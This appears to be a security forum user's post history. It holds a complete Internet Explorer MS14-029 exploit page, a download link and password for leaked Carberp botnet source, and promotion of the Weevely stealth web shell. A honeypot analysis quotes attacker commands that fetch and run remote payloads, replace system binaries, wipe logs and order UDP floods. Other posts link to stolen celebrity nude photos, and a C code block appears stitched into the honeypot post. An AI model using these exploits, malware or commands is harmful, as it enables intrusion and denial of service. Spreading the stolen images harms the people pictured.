Nytro

Everything posted by Nytro

  1. Crap on bread:
     - they have no website (Wiki-shit)
     - the presentation video is aimed at Anonymous-wannabe chavs
     - I would have liked the "graphics"... when I was 12
     Kali, a stable operating system maintained by a team of professionals, does not compare with this piece of junk.
     Edit: I'm looking over their "install-cloud-crap-on-bread" script:
     echo "deb http://frozenbox.mirror.garr.it/mirrors/parrot stable main" > /etc/apt/sources.list.d/parrot.list
     echo "deb http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\n\ndeb http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free" > /etc/apt/sources.list.d/debian.list
     echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list
     echo "deb http://repo.mate-desktop.org/debian wheezy main" > /etc/apt/sources.list.d/mate.list
     wget -qO - http://repository.frozenbox.org/parrot/frozenbox.gpg.key | apt-key add -
     wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add -
     wget -qO - http://repo.mate-desktop.org/debian/mate-archive-keyring.gpg | apt-key add -
     apt-get update
     apt-get -y install apt-parrot --no-install-recommends
     apt-get update
     apt-get -y install parrot-core parrot-cloud parrot-tools-cloud
     apt-get dist-upgrade
     More precisely:
     echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list
     wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add -
     It was obvious: it's just a half-assed recoloured Kali.
  2. C/C++ and Buffer Overflow Topics
     Buffer overflow, one of the most widely used exploits of the last decades, has affected the internet domain at large, for example through viruses and worms. What is the real cause, actually? In this tutorial we will investigate some of the fundamental reasons that can be found in C/C++ programs, applications and processors that can generate the buffer overflow problem. Though most of the C/C++ functions/libraries have already implemented new constructs, the secure constructs, the effect can still be seen today. You will see that programmers also must be competent and take responsibility for building programs or applications that are secure.
     - Introduction - Intro to how and why buffer overflow happens and is exploited.
     - Basic of x86 Architecture - The basics of the Intel processor internal architecture related to buffer overflow topics, registers and basic instruction set operations.
     - Assembly Language - Introduction to assembly language, needed to program buffer overflow code during shellcode building, payload crafting and shrinking the size of the C programs.
     - Compiler, Assembler & Linker - The process of compiling, assembling and linking C/C++ code, the step-by-step operations.
     - C Function Operation - The details of C/C++ function operation, stack call setup and destruction.
     - C Stack Setup - The C/C++ stack story, exposes the exploited buffer in registers.
     - Stack Operation - The C/C++ stack operation that exposes the exploited buffer.
     - Stack-based Buffer Overflow - How the processor's buffer can be overflown by malicious code.
     - Shellcode: The Payload - Understanding and creating the shellcodes for buffer overflow payloads, creating the malicious code.
     - Vulnerability & Exploit Examples - Testing real C code in a real and controlled environment to show buffer overflow in action. Escalating the local Linux Fedora Core root privilege.
     - C, C++ and Buffer Overflow Books
     See more at: The buffer overflow hands-on tutorial using C programming language on Linux/Unix platforms and Intel microprocessor architecture with C code samples and tons of illustrations
  3. Nude photos of Jennifer Lawrence and others posted online by alleged hacker
     Website user publishes list of 100 mostly female actors, singers and celebrities of whom they claim to have explicit images
     Paul Farrell
     Pictures of Hunger Games star Jennifer Lawrence have been circulating on the internet. Photograph: Rotello/Photofab/REX
     Images of more than 100 well-known actors, singers and celebrities, including what appear to be nude photos and videos, may have been exposed by a hacker in a major breach of privacy. On Sunday a user on the 4chan website posted a list of mostly female actors and public figures, including Jennifer Lawrence, Avril Lavigne, Kim Kardashian, Rihanna, Kirsten Dunst, Aubrey Plaza and Winona Ryder, of whom they claim to have explicit photographs or videos. A number of photos from some celebrities, including Hunger Games star Lawrence, have since been circulating on file-sharing and photo sites. 4chan quickly removed the posts from their site, but screenshots of the list by one of the posters show a list of more than 60 names of celebrities who are alleged to have been hacked. The release of the images has drawn varying responses from the celebrities, with some conceding they are real photos and others denying their veracity. Buzzfeed reported that the user had also posted images of his desktop, one of which appeared to be an image of Jennifer Lawrence. A spokesman for Lawrence said: "This is a flagrant violation of privacy. The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence."
     Blah blah. The nude photos are here: http://www.reddit.com/r/TheFappening/comments/2f44n0/new_celeb_leaked_pics_all_in_one_place/
     Jennifer Lawrence: http://imgur.com/a/KWOV2#0
     Source: Nude photos of Jennifer Lawrence and others posted online by alleged hacker | World news | theguardian.com
  4. Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files). Also see: unix-privesc-check | pentestmonkey Download: https://code.google.com/p/unix-privesc-check/
  5. Weevely
     Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing. Start with a quick Tutorial, read about Modules and Generators.
     - More than 30 modules to automate administration and post exploitation tasks
     - Backdoor communications are hidden in HTTP Cookies
     - Communications are obfuscated to bypass NIDS signature detection
     - Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection
     Download: https://epinna.github.io/Weevely/
  6. Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP. Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible. To learn more about security and anonymity under Whonix, please continue to the About Whonix page. Info: https://www.whonix.org/
  7. Have fun: Leaks - Imgur. Jennifer Lawrence and other celebrities "naked" :->
  8. Carberp botnet, source code
     Online: https://github.uconn.edu/kll09002/Carberp
     Download: https://mega.co.nz/#!0YsXWBRD!CMqd9nrm1d0XABKlifI9vmxprpQ6RnfsdhBHeKrDXao
     Password: KJ1#w2*LadiOQpw3oi029)K Oa(28)uspeh
     Via: https://www.opensc.ws/leaked-sources/19525-carbep-botnet-source-code.html
  9. A bigger picture with tex: Don't be scared of the sword, it's for enemies; innocent people have nothing to fear (if they pay the protection fees).
  10. An in-depth analysis of SSH attacks on Amazon EC2
      Summary
      The research study investigates Secure Shell (SSH) attacks on Amazon EC2 cloud instances across different AWS zones by deploying Smart Honeypots (SH). It provides an in-depth analysis of SSH attacks and the SSH intruders' profile, and attempts to identify their tactics and purposes. Key observations for this research experiment are as follows:
      - Without disclosure of the SHs' IP addresses, the first brute-force attempt was detected in less than 10 hours.
      - Over 89% of intruders only targeted one SH in one zone;
      - Three threat actors (attacker profiles) were detected – brute-forcer, infector and commander – whose source IP addresses were completely different;
      - Typically, blacklists are limited to preventing the first threat actor, i.e. the brute-forcer, and not the other two;
      - The top three (3) origin countries of attacks (based on whois information) were China, Russia and Egypt;
      - Some password lists used for brute-forcing the SSH service were limited to a few passwords and targeted toward compromising other malicious groups' infected hosts;
      - VoIP services, network appliances and development tools account names were constantly targeted by intruders;
      - Upon a successful password guess, a new actor (Infector) appeared, uploaded malicious files to the SH, and a connection was made to an external Command and Control server;
      - A number of tactics were used to hide malicious executables, replace legitimate executables with infected ones and disable audit functionality of the operating system;
      - A third actor (Commander) employed the infected SH to conduct denial-of-service (DoS) attacks;
      - On average an intruder's source IP address was observed for a day and there was no further connection to check the status of the infected host or re-deploy the malicious files.
      Introduction
      Start a Cloud instance and you will be shocked by the number of 'malicious' attempts against your vanilla Cloud server. Well, you may not even be aware of those if you don't monitor your network traffic, in and out of your server. Password brute-force attempts are among the most common security attacks, and adversaries are performing Internet-wide scanning, probing and penetration of weak credentials on SSH services. As one of the use-cases for Smart Honeypot, I did a research experiment on SSH password brute-force attempts in the Amazon EC2 environment to profile the adversaries and identify their tactics.
      Experiment setup
      The following list gives the details of the experiment.
      - Number of Smart Honeypots: three (3)
      - Period of experiment: fourteen (14) days
      - Start and end dates: 7 May 2014 to 21 May 2014
      - EC2 regions: North California (US), Oregon (US), Singapore (SG)
      - Cloud instance base-image: Ubuntu 13.04 – EC2 Micro Instance
      - IP address: Default EC2 Public IP range for each zone
      For each SH, I used an EC2 Micro Instance as a base, which has an SSH service exposed by default. From an external perspective, this resembles a typical EC2 Micro Instance. SH is equipped with its own unique technologies and has not borrowed from any known honeypot solution (as argued here). Additionally, the techniques that are used within SH cannot be publicly disclosed, in order to hide its presence from attackers and make it ideal to profile them. No domain name was mapped to the SH public IP addresses and their addresses were not disclosed or advertised anywhere. The SSH service was modified to accept authentication through username and password (i.e. keyboard based) as well as public-private keys. An additional username (i.e. git) with a weak password was created on the SSH server. The super user (i.e. root) password was also selected from a common password word-list. Passwords on each SH were selected differently. Throughout the experiment, once an account was compromised and the intruder was profiled, the password was changed to a different combination. Outgoing network traffic was actively monitored and filtered. This was a safeguard so that the infrastructure could not be (mis)used to target other Internet hosts.
      Observation
      In all observations, I assume there is only one actor behind a single IP address. It took less than ten (10) hours to receive the first brute-force attempt on the SH. The first successful password guess happened after 5 days and the subsequent successful attempt happened in less than 2 days. 91 unique successful password guesses happened during the experiment period. Three threat actors were identified during the experiment (Figure 1), each sourced from a unique IP address.
      Figure 1: Three (3) threat actors behind all SSH attacks
      Brute-forcer
      The brute-force (bot) attempted to brute force the target to find a correct username and password combination. As expected, their behaviour was fully automated.
      - Some bots attempted guessing a single username and password combination across all SHs and, once unsuccessful, moved to the next password combination. This behavior was noticed since the bot IP address was observed across SHs in a short span of time (usually a few seconds);
      - Some bots attempted to brute-force a set of username and password combinations on a single SH and then moved to the next SH.
      - Some bots used threading and initiated parallel connections to the SSH service. This behavior was noticeable as the password brute-force attempt did not stop immediately after a successful guess.
      The majority of bots only targeted one SH. 12% of bot source IP addresses were observed on all the SHs, while the remaining 88% only targeted one SH. The majority of bots were seen over a single day and a few over a span of two days. No further activity was observed from the same source IP address.
      Figure 2: Percentage of intruders that target all Smart Honeypots vs. one Smart Honeypot
      Password lists
      Some bots tried a limited set of passwords, normally fewer than 5 items. The password combinations were not something common and it seems like they target particular servers or attempt to penetrate other malicious groups' compromised servers:
      @#$%hackin2inf3ctsiprepe@#$%
      darkhackerz01
      ullaiftw5hack
      t0talc0ntr0l4!
      Among the passwords there were instances such as "shangaidc" and "lanzhon" (Chinese terms) that were initially collected on the Singapore-based SH; however, later on, the passwords were observed in the other zones. The majority of bots used publicly available password lists such as RockYou or the 500 worst passwords list (see https://wiki.skullsecurity.org/Passwords).
      Targeted user accounts
      The majority of attempts targeted super accounts such as "root" or "admin". The other group of highly targeted usernames were network appliances, development tools, and VoIP services:
      - teamspeak (a VoIP software, popular among video game players)
      - git, svn (code repositories for software development)
      - nagios, vyatta (network appliances)
      Demographic
      Note: The reader should be reminded that the information was collected only by looking at the registration information (i.e. whois) of the intruder IP address and it should not be perceived as the intrusions being orchestrated by a particular nation. A computer savvy person is aware of the fact that source IP addresses can be easily spoofed. The following picture demonstrates the origin country of the bots based on the IP whois information.
      Figure 3: SSH attacks' origin countries (top left Singapore and right top and bottom US SHs)
      The majority of the attempts were sourced from China, followed by Russia targeting the Singapore-based SH and Egypt for the US-based SHs. There was no intrusion observed from Russia on the US-based SHs and from Egypt on the Singapore-based SH throughout the experiment.
      Infector
      Upon a successful brute-force attempt, the bot stopped communicating with the SH (only in one instance did the bot continue brute-forcing, however targeting a different user account) and it was interesting to observe that there was no further connection from the bot's source IP address; instead, a new IP address with the correct username and password was observed authenticating to SSH. The new intruder, which I called Infector, attempted to infect the SH by using malicious scripts or binary files. The majority of the infectors used Secure Copy (scp) to transfer files to the SH, while there were instances where 'wget' was used to download malicious files from an external server. Upon successful file upload, the infector executed a number of commands before and after execution of the malicious files. In the example below, the infector checks the available memory on the host, checks the last logged-in users, changes the permission settings on the malicious script (i.e. httpd.pl) and executes it. Finally she clears the history of her commands.
      "free -m",<ret>,"last",<ret>,"cd /var/tmp",<ret>,"chmod 777 httpd.pl",<ret>,"perl httpd.pl",<ret>,"cd",<ret>,"rm -rf .bash_history",<ret>,"history -c && clear",<ret>,"history -c && clear",<ret>
      In another example (below), the infector first checks whether the system is 64-bit or 32-bit, then, after relaxing the malicious binary's permissions, executes the binary and puts it in the background to make sure the process keeps running even after logging out.
      "getconf LONG_BIT",<ret>,<^V>,"chmod 0755 ./DDos32",<ret>,"/dev/null 2>&1 &",<ret>,"nohup ./DDos32 > /dev/null 2>&1 &",<ret>
      The above two examples were found to be scripted or automated; however, there were a few instances where the interaction seemed to be manual. The infector was found to key in the commands, frequently using the 'backspace' key to correct typos (see below).
      bash "cd /etc",<ret>,"wget http://94.199.187.154/.../k.tgz; tar zxvf k.tgz ; rm -rf k.tgz;" ,<ret>," cd .kde; chmod +x *; ./start.sh; ",<ret>," ./bleah 87.98.216.186; ./bleah mgx1.magex.hu; ",<ret>,"/sbin/service crond restart",<ret>, "service crond restart",<ret>,"/etc/init.d/crond restart",<nl>,"w",<nl>, " historye",<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>, <backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>, <backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>, <backspace>,<backspace>,<backspace>,"oasswd",<ret>,"passwd",<ret>, "history -c",<ret>,"exit",<ret>
      After deployment of the malicious files, no further interactions were observed from infectors. In some instances, I even killed the malicious process, in order to see if the infector would attempt to reconnect and re-deploy the malicious file. The infector used a number of techniques to hide the existence of malicious files or replace legitimate binaries with malicious equivalents. Additionally, the infector attempted to clean her tracks by resetting the audit log file or disabling it. The following is the series of commands that the infector executed on the SH, where she replaced the legitimate binaries with malicious ones and attempted to load and execute a malicious kernel module.
      chmod 0755 /tmp/.bash_root.tmp3
      nohup /tmp/.bash_root.tmp3
      nohup /tmp/.bash_root.tmp3
      chattr +i .bash_root.tmp3
      chattr +i /tmp/.bash_root.tmp3
      insmod /usr/lib/xpacket.ko
      ln -s /etc/init.d/DbSecuritySpt /etc/rc1.d/S97DbSecuritySpt
      ln -s /etc/init.d/DbSecuritySpt /etc/rc2.d/S97DbSecuritySpt
      ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt
      ln -s /etc/init.d/DbSecuritySpt /etc/rc4.d/S97DbSecuritySpt
      ln -s /etc/init.d/DbSecuritySpt /etc/rc5.d/S97DbSecuritySpt
      mkdir -p /usr/bin/bsd-port
      cp -f /tmp/.bash_root.tmp3 /usr/bin/bsd-port/getty
      usr/bin/bsd-port/getty
      mkdir -p /usr/bin/dpkgd
      cp -f /bin/netstat /usr/bin/dpkgd/netstat
      mkdir -p /bin
      cp -f /tmp/.bash_root.tmp3 /bin/netstat
      chmod 0755 /bin/netstat
      cp -f /bin/ps /usr/bin/dpkgd/ps
      mkdir -p /bin
      cp -f /tmp/.bash_root.tmp3 /bin/ps
      chmod 0755 /bin/ps
      cp -f /usr/bin/lsof /usr/bin/dpkgd/lsof
      mkdir -p /usr/bin
      cp -f /tmp/.bash_root.tmp3 /usr/bin/lsof
      chmod 0755 /usr/bin/lsof
      mkdir -p /usr/bin
      cp -f /tmp/.bash_root.tmp3 /usr/bin/smm
      usr/bin/smm
      ln -s /etc/init.d/selinux /etc/rc1.d/S99selinux
      ln -s /etc/init.d/selinux /etc/rc2.d/S99selinux
      ln -s /etc/init.d/selinux /etc/rc3.d/S99selinux
      ln -s /etc/init.d/selinux /etc/rc4.d/S99selinux
      ln -s /etc/init.d/selinux /etc/rc5.d/S99selinux
      usr/bin/bsd-port/udevd
      insmod /usr/lib/xpacket.ko
      The following example shows the audit logs were disabled (i.e. piped to null).
      ubuntu@ip-172-31-6-109:~$ ls -l /var/log
      total 1040
      …[sNIP]…
      lrwxrwxrwx 1 root root 9 May 20 12:26 auth.log -> /dev/null
      -rw-r----- 1 syslog adm 296097 May 18 07:24 auth.log.1
      -rw-r----- 1 syslog adm 7095 May 14 07:32 auth.log.2.gz
      -rw-r--r-- 1 root root 1535 May 13 14:16 boot.log
      lrwxrwxrwx 1 root root 9 May 20 12:26 btmp -> /dev/null
      -rw-r--r-- 1 syslog adm 37823 May 13 14:16 cloud-init.log
      drwxr-xr-x 2 root root 4096 Oct 10 2012 dist-upgrade
      …[sNIP]…
      lrwxrwxrwx 1 root root 9 May 20 12:26 lastlog -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 09:48 messages -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 09:48 secure -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 12:26 security -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 12:26 utx.lastlogin -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 12:26 utx.log -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 12:26 wtmp -> /dev/null
      lrwxrwxrwx 1 root root 9 May 20 09:48 xferlog -> /dev/null
      The following is the output of netstat during the infection.
      Active Internet connections (servers and established)
      Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
      tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 673/sshd
      tcp 0 0 127.0.0.1:10808 0.0.0.0:* LISTEN 22589/.bash_root.tm
      tcp 0 0 127.0.0.1:10808 127.0.0.1:40878 ESTABLISHED 22589/.bash_root.tm
      tcp 0 0 172.31.6.109:22 60.169.77.233:4660 ESTABLISHED 23350/0
      tcp 0 0 127.0.0.1:40878 127.0.0.1:10808 ESTABLISHED 22583/.bash_root.tm
      tcp 0 60 172.31.6.109:37806 183.57.38.250:36000 ESTABLISHED 22583/.bash_root.tm
      tcp6 0 0 :::22 :: LISTEN 673/sshd
      udp 0 0 0.0.0.0:53 0.0.0.0:* 19684/tinydns
      udp 0 0 0.0.0.0:68 0.0.0.0:* 468/dhclient3
      And the following example shows the list of files uploaded and extracted on the SH.
      root@ip-172-31-6-109:~# ls -al /tmp
      total 1848
      drwxrwxrwt 4 root root 4096 May 23 01:20 .
      drwxr-xr-x 24 root root 4096 May 20 11:54 ..
      -rwxr-xr-x 1 root root 1344645 May 20 11:39 .bash_root.tmp3
      -rwxr-xr-x 1 root root 353564 May 21 12:55 .bash_root.tmp3h
      -rwxr-xr-x 1 root root 5 May 21 12:55 bill.lock
      -rw-r--r-- 1 root root 69 May 22 16:03 conf.n
      -rwxr-xr-x 1 root root 5 May 21 12:55 gates.lock
      drwxr-xr-x 2 root root 4096 Apr 21 04:17 get
      -rw-r--r-- 1 root root 147456 May 17 17:18 go.tar.gz
      drwx------ 2 root root 4096 May 20 11:52 mc-root
      -rwxr-xr-x 1 root root 5 May 21 12:55 moni.lock
      -rw-r--r-- 1 root root 72 May 21 01:51 rc.local
      -rw-r--r-- 1 root root 19 May 21 01:32 resolv.conf
      Commander
      Upon successful deployment of malicious files, in all cases, an outbound connection was initiated from the SH to a C&C server. The Commander, the third actor, is a malicious entity who controls the C&C server and remotely sends commands to infected hosts. Figure 4 shows the IRC welcome message from one of the C&C servers.
      Figure 4: an example of IRC welcome message on a C&C server hosted on 5.254.116.134 (provider: Voxility)
      In most cases, the C&C server was IRC based and the infected host joined an IRC channel and got assigned a nickname for communication with the Commander. Throughout the experiment, the infected SHs were employed to initiate DoS attacks against two external servers:
      :Gucci!Gucci@34635712.46 PRIVMSG #Support :!bot @udpflood 198.61.234.201 53 65500 60..
      :Gucci!Gucci@34635712.46 PRIVMSG #Support :!bot @udpflood 245.167.133.214 53 65500 120..
      And below is the response from the infected host once the task is completed:
      PRIVMSG #Support :.4|.12.:.3UDP DDoS.12:..4|.12 Attacking .4 198.61.234.201 53 .12 with .4 65500 .12 Kb Packets for .4 60 .12 seconds..
      The attack was targeted on port 53 (DNS) for durations of 60 seconds and 120 seconds. Please note that all outbound connections from the SH were monitored and filtered in order to prevent any possible harm to external servers. That's all for now. There are still other interesting points that I am investigating and will cover in future posts.
      How to protect yourself against SSH attacks
      Three (3) tips that can strongly improve the security posture of your SSH service (there are lots of other things you can do, but these three will help the most):
      - Be cautious of running blacklisting software such as Fail2ban. You may crash your own server (more details: https://wiki.archlinux.org/index.php/fail2ban). Instead, whitelist access to the SSH service; if not possible, use an external blacklist feed to block intruders. Remember, if you use a generic blacklist feed, on average, it blocks 12% of your actual intruders;
      - Disable username and password (keyboard-based) authentication on the SSH service. If not possible, set up Two-Factor authentication (more here); and
      - Run the SSH service on a non-default port (security by obscurity!).
      Malicious scripts and binary files, password lists etc. are available for download to the research community. Get in touch if you are interested in receiving a copy. Do you want to find out more about your environment's attackers and their tactics? Fill up this form for an invitation to a free Smart Honeypot VIP plan.
      Source: An in-depth analysis of SSH attacks on Amazon EC2 | Smart Honeypot
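The brute-forcer/infector hand-off the post describes (an account hammered from one address, then an accepted login for it from a different address that never failed once) written as detection logic over sshd auth.log lines; this is an added example, not Smart Honeypot's code, and the sample lines, FAIL_THRESHOLD and the struct names are assumptions.

```c
/* Added example (not Smart Honeypot's code): maps sshd auth.log lines onto the
 * actor model above. A brute-forcer is an IP with >= FAIL_THRESHOLD failed
 * logins; a hand-off is an accepted login for an account a brute-forcer hit,
 * coming from an IP that never failed at all (the "infector" using the guessed
 * credential). Log lines are constructed (RFC 5737 addresses). */
#include <stdio.h>
#include <string.h>

#define FAIL_THRESHOLD 3   /* assumed tuning value */
#define MAX_IPS 32
#define MAX_USERS 8

typedef struct {
    char ip[46];
    int failures;               /* failed logins from this IP      */
    char users[MAX_USERS][32];  /* accounts this IP failed against */
    int nusers;
} IpStats;

typedef struct {
    IpStats ips[MAX_IPS];
    int nips;
    int brute_forcers;          /* IPs with failures >= FAIL_THRESHOLD    */
    int brute_force_successes;  /* accepted logins from a brute-forcer IP */
    int hand_offs;              /* accepted logins matching the hand-off  */
} Report;

/* One bot hammers root/teamspeak/git and guesses git; later a second address
 * that never failed logs in as git: that second login is the hand-off. */
static const char *SAMPLE_LOG[] = {
    "May 12 03:14:01 ip-172-31-6-109 sshd[2201]: Failed password for root from 203.0.113.5 port 51234 ssh2",
    "May 12 03:14:03 ip-172-31-6-109 sshd[2203]: Failed password for root from 203.0.113.5 port 51240 ssh2",
    "May 12 03:14:05 ip-172-31-6-109 sshd[2205]: Failed password for invalid user teamspeak from 203.0.113.5 port 51244 ssh2",
    "May 12 03:14:07 ip-172-31-6-109 sshd[2207]: Failed password for git from 203.0.113.5 port 51250 ssh2",
    "May 12 03:14:09 ip-172-31-6-109 sshd[2209]: Failed password for git from 203.0.113.5 port 51252 ssh2",
    "May 12 03:14:11 ip-172-31-6-109 sshd[2211]: Failed password for git from 203.0.113.5 port 51254 ssh2",
    "May 12 03:14:13 ip-172-31-6-109 sshd[2213]: Accepted password for git from 203.0.113.5 port 51258 ssh2",
    "May 12 11:02:40 ip-172-31-6-109 sshd[3310]: Accepted password for git from 198.51.100.7 port 40022 ssh2",
    "May 12 12:30:00 ip-172-31-6-109 sshd[3400]: Accepted publickey for ubuntu from 192.0.2.10 port 50001 ssh2",
};

/* Extract result ("Failed"/"Accepted"), user and source IP; 0 if not an auth line. */
static int parse_auth_line(const char *line, char *result, char *user, char *ip) {
    const char *p = strstr(line, "sshd[");
    if (!p || !(p = strstr(p, "]: "))) return 0;
    p += 3;
    if (!strncmp(p, "Failed ", 7)) strcpy(result, "Failed");
    else if (!strncmp(p, "Accepted ", 9)) strcpy(result, "Accepted");
    else return 0;
    if (!(p = strstr(p, " for "))) return 0;
    p += 5;
    if (!strncmp(p, "invalid user ", 13)) p += 13;   /* unknown account form */
    return sscanf(p, "%31s from %45s", user, ip) == 2;
}

static IpStats *find_ip(Report *r, const char *ip, int create) {
    for (int i = 0; i < r->nips; i++)
        if (!strcmp(r->ips[i].ip, ip)) return &r->ips[i];
    if (!create || r->nips == MAX_IPS) return NULL;
    IpStats *s = &r->ips[r->nips++];   /* slot is already zeroed by analyse() */
    strncpy(s->ip, ip, sizeof s->ip - 1);
    return s;
}

static int failed_against(const IpStats *s, const char *user) {
    for (int i = 0; i < s->nusers; i++)
        if (!strcmp(s->users[i], user)) return 1;
    return 0;
}

void analyse(const char **lines, int n, Report *r) {
    char result[16], user[32], ip[46];
    memset(r, 0, sizeof *r);
    /* Pass 1: failures per source IP and the accounts each one went after. */
    for (int i = 0; i < n; i++) {
        if (!parse_auth_line(lines[i], result, user, ip) || strcmp(result, "Failed")) continue;
        IpStats *s = find_ip(r, ip, 1);
        if (!s) continue;
        s->failures++;
        if (!failed_against(s, user) && s->nusers < MAX_USERS)
            strncpy(s->users[s->nusers++], user, 31);
    }
    for (int i = 0; i < r->nips; i++)
        if (r->ips[i].failures >= FAIL_THRESHOLD) r->brute_forcers++;
    /* Pass 2: judge every accepted login against the brute-forcers. */
    for (int i = 0; i < n; i++) {
        if (!parse_auth_line(lines[i], result, user, ip) || strcmp(result, "Accepted")) continue;
        int hammered = 0;
        for (int j = 0; j < r->nips; j++)
            if (r->ips[j].failures >= FAIL_THRESHOLD && failed_against(&r->ips[j], user)) hammered = 1;
        if (!hammered) continue;   /* ordinary login to an account nobody brute-forced */
        const IpStats *s = find_ip(r, ip, 0);
        if (s && s->failures >= FAIL_THRESHOLD) r->brute_force_successes++;
        else if (!s) r->hand_offs++;   /* never a single failure from this address */
    }
}

const Report *sample_report(void) {
    static Report r;
    analyse(SAMPLE_LOG, (int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]), &r);
    return &r;
}

int main(void) {
    const Report *r = sample_report();
    printf("brute-forcer IPs: %d, logins by brute-forcers: %d, hand-offs: %d\n",
           r->brute_forcers, r->brute_force_successes, r->hand_offs);
    return 0;
}
```

An IP with a few failures below the threshold is deliberately counted as neither actor, so a single mistyped password by an admin does not flag a hand-off.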
  11. Microsoft Internet Explorer MS14-029 Memory Corruption
      Authored by PhysicalDrive0
      Microsoft Internet Explorer memory corruption proof of concept exploit that leverages the vulnerability noted in MS14-029.
      <!doctype html>
      <html>
      <head>
      <meta http-equiv="Cache-Control" content="no-cache"/>
      <script>
      function stc() { var Then = new Date(); Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); }
      function cid() { var swf = 0; try { swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { } if (!swf) return 0; var cookieString = new String(document.cookie); if(cookieString.indexOf("d93kaj3Nja3") == -1) {stc(); return 1;}else{ return 0;} }
      String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
      var tpx=unescape("%u1414%u1414").repeat(0x60/4-1);
      var ll=new Array();
      for (i=0;i<3333;i++)ll.push(document.createElement("img"));
      for(i=0;i<3333;i++) ll[i].className=tpx;
      for(i=0;i<3333;i++) ll[i].className="";
      CollectGarbage();
      function b2() { try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){} try{xdd.outerText='';}catch(exception){} CollectGarbage(); for(i=0;i<3333;i++) ll[i].className=tpx; }
      function a1(){ if (!cid()) return; document.body.contentEditable="true"; try{xdd.applyElement(document.createElement("frameset"));}catch(exception){} try{document.selection.createRange().select();}catch(exception){} }
      </script>
      </head>
      <body onload='setTimeout("a1();",2000);' onresize=b2()>
      <marquee id=xdd > </marquee>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> <param name="movie" value="storm.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="true" /> </object>
      </body>
      <body>
      <form name=loading>
      <p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
      <input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
      <input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
      <script>
      var bar=0
      var line="||"
      var amount="||"
      count()
      function count(){
      bar=bar+2
      amount =amount + line
      document.loading.chart.value=amount
      document.loading.percent.value=bar+"%"
      if (bar<99)
      {setTimeout("count()",500);}
      else
      {window.location = "http://www.google.com.hk";}
      }</script>
      </p>
      </form>
      <p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
      </body>
      </html>
      Source: Microsoft Internet Explorer MS14-029 Memory Corruption - Packet Storm
  12. Exactly what I wanted to post. Too bad that right now everyone is over at "Interlopi" in Offtopic
  13. [h=3]Windows Heap Overflow Exploitation[/h] Hi , In this article I will be talking about exploiting a custom heap : which is a big chunk of memory allocated by the usermode application using VirtualAlloc for example . The application will then work on managing 'heap' block allocations and frees (in the allocated chunk) in a custom way with complete ignorance of the Windows's heap manager. This method gives the software much more control over its custom heap, but it can result in security flaws if the manager doesn't do it's job properly , we'll see that in detail later. To see an implementation of a custom heap manager in C/C++ please refer to my previous blog post : Reverse Engineering 0x4 Fun: Creating and using your own 'heap' manager Heap Manager Source code : [C++] Custom Heap Manager - Pastebin.com The vulnerability that we'll exploit together today is a 'heap' overflow vulnerability that's occuring in a custom heap built by the application. The vulnerable software is : ZipItFast 3.0 and we'll be exploiting it today and gaining code execution under Windows 7 . ASLR , DEP , SafeSEH aren't enabled by default in the application which makes it even more reliable to us . Even though , there's still some painful surprises waiting for us ... Let's just start : The Exploit : I've actually got the POC from exploit-db , you can check it right here : ZipItFast 3.0 - 